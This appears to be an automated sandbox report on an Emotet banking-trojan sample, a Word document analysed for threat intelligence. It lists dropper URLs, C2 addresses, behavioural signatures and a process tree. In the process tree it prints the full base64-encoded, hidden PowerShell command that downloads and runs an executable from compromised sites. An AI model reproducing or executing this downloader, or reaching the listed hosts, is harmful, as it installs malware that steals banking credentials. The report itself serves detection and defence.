emotet | 79073477216da5244bd8d2ab2053f21b26e57675d1a507dabd194134c27bd148

General

Target

79073477216da5244bd8d2ab2053f21b26e57675d1a507dabd194134c27bd148
Sample

200120-m9q6xhbvzn
SHA256

79073477216da5244bd8d2ab2053f21b26e57675d1a507dabd194134c27bd148

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://sanketpatil.online/wp-includes/rBhbqf/

exe.dropper

http://deals.autostar.com.sa/wp-admin/tnibbgr-7y3i2-4052100/

exe.dropper

http://activatemagicsjacks.xyz/wp-admin/pzp2my-a4ma-335/

exe.dropper

http://heminghao.club/phpmyadmin/bos25l-sisvzsm-51/

exe.dropper

http://redbeat.club/wp-snapshots/fzAArnYv/

Extracted

Family

emotet

C2

98.192.74.164:80

59.135.126.129:443

24.70.40.15:8080

178.33.167.120:8080

144.76.56.36:8080

176.58.93.123:80

51.38.134.203:8080

58.92.179.55:443

190.201.144.85:7080

201.183.251.100:80

192.210.217.94:8080

14.161.30.33:443

212.112.113.235:80

23.253.207.142:8080

1.217.126.11:443

61.221.152.140:80

78.189.165.52:8080

149.202.153.251:8080

91.73.169.210:80

212.129.14.27:8080

rsa_pubkey.plain

Signatures

Suspicious behavior: EmotetMutantsSpam 2 IoCs

pid	Process
1824	160.exe
3744	ipmirun.exe

Emotet
Emotet is a trojan that is primarily spread through spam emails
trojan banker emotet

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4884	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4360	1828	Powershell.exe	74

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
4360	Powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 4360 wrote to memory of 4564	4360	Powershell.exe	80
PID 4564 wrote to memory of 1824	4564	160.exe	81
PID 4648 wrote to memory of 3744	4648	ipmirun.exe	83

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Drops file in System32 directory 1 IoCs

description	ioc	Process
File renamed	C:\Users\Admin\160.exe => C:\Windows\SysWOW64\ipmirun.exe	160.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
4884	WINWORD.EXE
4564	160.exe
1824	160.exe
4648	ipmirun.exe
3744	ipmirun.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4360	Powershell.exe

Executes dropped EXE 4 IoCs

pid	Process
4564	160.exe
1824	160.exe
4648	ipmirun.exe
3744	ipmirun.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\79073477216da5244bd8d2ab2053f21b26e57675d1a507dabd194134c27bd148.doc" /o ""
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
PID:4884

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABXAHoAcAB0AGUAcABvAG4AcgA9ACcAQQB6AHIAaABsAHkAbQBwAHMAJwA7ACQAUgBvAGgAdgBtAHoAbgBxAHAAbAAgAD0AIAAnADEANgAwACcAOwAkAEIAaAByAHgAbwBpAGQAZABpAHUAYwA9ACcAWgBrAGsAaABwAGQAdQBzACcAOwAkAFQAdAB0AGsAawBlAGEAbwBlAHAAdwBkAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABSAG8AaAB2AG0AegBuAHEAcABsACsAJwAuAGUAeABlACcAOwAkAFcAdgBzAGIAcgBjAHYAeABlAD0AJwBOAG0AbgByAHoAZgBvAHYAdwBnACcAOwAkAEoAbgBzAGYAaQBpAG4AdABxAHgAbABkAGwAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAG4ARQBUAC4AVwBlAGIAQwBsAEkARQBOAHQAOwAkAEkAcgB6AGQAaQBsAHMAegBsAD0AJwBoAHQAdABwADoALwAvAHMAYQBuAGsAZQB0AHAAYQB0AGkAbAAuAG8AbgBsAGkAbgBlAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcgBCAGgAYgBxAGYALwAqAGgAdAB0AHAAOgAvAC8AZABlAGEAbABzAC4AYQB1AHQAbwBzAHQAYQByAC4AYwBvAG0ALgBzAGEALwB3AHAALQBhAGQAbQBpAG4ALwB0AG4AaQBiAGIAZwByAC0ANwB5ADMAaQAyAC0ANAAwADUAMgAxADAAMAAvACoAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAYQB0AGUAbQBhAGcAaQBjAHMAagBhAGMAawBzAC4AeAB5AHoALwB3AHAALQBhAGQAbQBpAG4ALwBwAHoAcAAyAG0AeQAtAGEANABtAGEALQAzADMANQAvACoAaAB0AHQAcAA6AC8ALwBoAGUAbQBpAG4AZwBoAGEAbwAuAGMAbAB1AGIALwBwAGgAcABtAHkAYQBkAG0AaQBuAC8AYgBvAHMAMgA1AGwALQBzAGkAcwB2AHoAcwBtAC0ANQAxAC8AKgBoAHQAdABwADoALwAvAHIAZQBkAGIAZQBhAHQALgBjAGwAdQBiAC8AdwBwAC0AcwBuAGEAcABzAGgAbwB0AHMALwBmAHoAQQBBAHIAbgBZAHYALwAnAC4AIgBzAFAAYABsAEkAdAAiACgAJwAqACcAKQA7ACQARwBtAG4AYgBoAGQAYQBoAHcAcwA9ACcAQwB3AGcAbABiAG0AdwB5AHAAcABsAHkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEkAegBkAGIAbQB2AHYAcABnAHAAbwBtAGsAIABpAG4AIAAkAEkAcgB6AGQAaQBsAHMAegBsACkAewB0AHIAeQB7ACQASgBuAHMAZgBpAGkAbgB0AHEAeABsAGQAbAAuACIAZABvAGAAdwBOAEwAbwBgAEEARABGAGkAbABlACIAKAAkAEkAegBkAGIAbQB2AHYAcABnAHAAbwBtAGsALAAgACQAVAB0AHQAawBrAGUAYQBvAGUAcAB3AGQAKQA7ACQAUQB5AGcAeABtAHoAegBtAGwAcABkAD0AJwBVAGUAbQBwAHYAbABzAHAAYwB6AGQAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABUAHQAdABrAGsAZQBhAG8AZQBwAHcAZAApAC4AIgBMAGAARQBuAGcAdABIACIAIAAtAGcAZQAgADMANQA1ADAAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYABBAFIAdAAiACgAJABUAHQAdABrAGsAZQBhAG8AZQBwAHcAZAApADsAJABZAHQAcQBiAHAAZQByAG4AYgBiAD0AJwBBAHYAcQBrAHEAaABhAHkAYwAnADsAYgByAGUAYQBrADsAJABBAHAAbgBmAGIAbgB6AGMAPQAnAFEAYQBzAHYAbgBvAHcAdwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABLAHEAcABrAHcAeQByAGkAPQAnAEwAaABlAHEAcABsAGIAegBxAHoAYgB5ACcA
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:4360
- C:\Users\Admin\160.exe
  "C:\Users\Admin\160.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  - Suspicious use of SetWindowsHookEx
  - Executes dropped EXE
  PID:4564
- - C:\Users\Admin\160.exe
    --739b8589
    3⤵
    - Suspicious behavior: EmotetMutantsSpam
    - Drops file in System32 directory
    - Suspicious use of SetWindowsHookEx
    - Executes dropped EXE
    PID:1824

C:\Windows\SysWOW64\ipmirun.exe
"C:\Windows\SysWOW64\ipmirun.exe"
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:4648
- C:\Windows\SysWOW64\ipmirun.exe
  --3b8f5b9e
  2⤵
  - Suspicious behavior: EmotetMutantsSpam
  - Suspicious use of SetWindowsHookEx
  - Executes dropped EXE
  PID:3744

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1824-10-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/1824-9-0x00000000020F0000-0x0000000002107000-memory.dmp

Filesize
92KB

Download
memory/3744-15-0x0000000000DE0000-0x0000000000DF7000-memory.dmp

Filesize
92KB

Download
memory/3744-16-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/4564-6-0x0000000002240000-0x0000000002257000-memory.dmp

Filesize
92KB

Download
memory/4648-12-0x0000000000D20000-0x0000000000D37000-memory.dmp

Filesize
92KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads